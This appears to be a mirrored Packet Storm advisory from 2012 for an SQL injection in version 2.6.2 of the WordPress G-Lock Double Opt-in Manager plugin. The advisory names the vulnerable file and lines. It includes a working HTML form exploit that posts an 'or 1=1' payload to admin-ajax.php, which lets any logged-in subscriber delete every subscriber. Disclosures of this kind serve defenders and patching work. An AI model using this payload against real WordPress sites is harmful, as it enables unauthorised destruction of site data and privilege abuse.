Lucene search
K

WordPress G-Lock Double Opt-in Manager 2.6.2 SQL Injection

🗓️ 01 Aug 2012 00:00:00Reported by BEASTIANType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

WordPress G-Lock Double Opt-in Manager 2.6.2 SQL Injection in ajaxbackend.ph

Code
`============================================================================  
WordPress G-Lock Double Opt-in Manager Plugin SQL Injection version <= 2.6.2  
============================================================================  
  
sql injection in file ajaxbackend.php line 519 and 817  
u must be logd in (subscriber or anything)  
u post data "action" = "gsom_aj_delete_subscriber" or "gsom_aj_unsubscribe"  
and data "json" = array in json  
  
here is html example. log in to wordpress and then go to this document:  
  
<html>  
<form method="post" action="http://myserver/wp-admin/admin-ajax.php">  
<input type="text" name="action" value="gsom_aj_delete_subscriber">  
<input type="text" name="json" value="["intId or 1=1"]">  
<input type="text" name="_" value="">  
<input type="submit">  
</form>  
</html>  
  
the admin-ajax will run the ajaxbackend eventually, and then all subscribers  
will be deleted, even though u r only a subscriber user!!!  
  
============================================================================  
found by::: BEASTIAN  
greetings to:: PRIZMA - SPACE ACE  
============================================================================  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation